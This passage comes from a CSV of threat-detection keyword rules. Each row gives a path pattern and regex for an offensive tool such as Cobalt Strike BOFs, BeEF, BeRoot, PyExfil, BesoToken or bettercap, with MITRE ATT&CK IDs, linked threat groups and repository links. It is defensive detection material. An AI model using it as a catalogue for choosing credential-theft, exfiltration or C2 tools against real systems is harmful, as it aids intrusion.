security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/bazarloader.profile*",".{0,1000}\/bazarloader\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","284","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/bbaranoff/CVE-2022-0847/*",".{0,1000}\/bbaranoff\/CVE\-2022\-0847\/.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation 
tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","48","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "*/beacon.h",".{0,1000}\/beacon\.h","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","1","N/A","10","10","155","24","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" "*/beacon_202_no_acl.log*",".{0,1000}\/beacon_202_no_acl\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/beacon_257-objects.log*",".{0,1000}\/beacon_257\-objects\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate 
BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/beacon_compatibility*",".{0,1000}\/beacon_compatibility.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*/beacon_compatibility.*",".{0,1000}\/beacon_compatibility\..{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","426","68","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*/beacon_funcs/*",".{0,1000}\/beacon_funcs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/beacon_generate.py*",".{0,1000}\/beacon_generate\.py.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*/beacon_health_check/*",".{0,1000}\/beacon_health_check\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","136","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" "*/beacon_http/*",".{0,1000}\/beacon_http\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/beacon_notify.cna*",".{0,1000}\/beacon_notify\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/BeaconChannel.cs*",".{0,1000}\/BeaconChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/beaconhealth.cna*",".{0,1000}\/beaconhealth\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","136","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" "*/beacon-injection/*",".{0,1000}\/beacon\-injection\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*/beacon-object-file*",".{0,1000}\/beacon\-object\-file.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/realoriginal/beacon-object-file","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/BeaconTool.java*",".{0,1000}\/BeaconTool\.java.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/beef.git*",".{0,1000}\/beef\.git.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/beef/extensions/*.rb*",".{0,1000}\/beef\/extensions\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/beef_bind_shell/*",".{0,1000}\/beef_bind_shell\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/beef_common.js*",".{0,1000}\/beef_common\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/beefbind/*",".{0,1000}\/beefbind\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/beefproject/*",".{0,1000}\/beefproject\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/Ben0xA/*",".{0,1000}\/Ben0xA\/.{0,1000}","offensive_tool_keyword","Github Username","Github username of known powershell offensive modules and scripts","T1059 - T1027 - T1064 - T1086 - T1191 - T1202","TA0002 - TA0003 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Ben0xA","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/beRoot.exe*",".{0,1000}\/beRoot\.exe.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/BeRoot.git*",".{0,1000}\/BeRoot\.git.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/beRoot.py*",".{0,1000}\/beRoot\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/beroot.py*",".{0,1000}\/beroot\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/beRoot.zip*",".{0,1000}\/beRoot\.zip.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/BeRoot/Linux/*",".{0,1000}\/BeRoot\/Linux\/.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/beroot/modules/*.py*",".{0,1000}\/beroot\/modules\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","1","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*/BesoToken.cpp*",".{0,1000}\/BesoToken\.cpp.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including 
non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*/BesoToken.exe*",".{0,1000}\/BesoToken\.exe.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*/BesoToken.git*",".{0,1000}\/BesoToken\.git.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*/bettercap*",".{0,1000}\/bettercap.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/BetterSafetyKatz.exe*",".{0,1000}\/BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/bgp_exfil.py*",".{0,1000}\/bgp_exfil\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*/bh_owned.py*",".{0,1000}\/bh_owned\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/bhqc.py -*",".{0,1000}\/bhqc\.py\s\-.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo 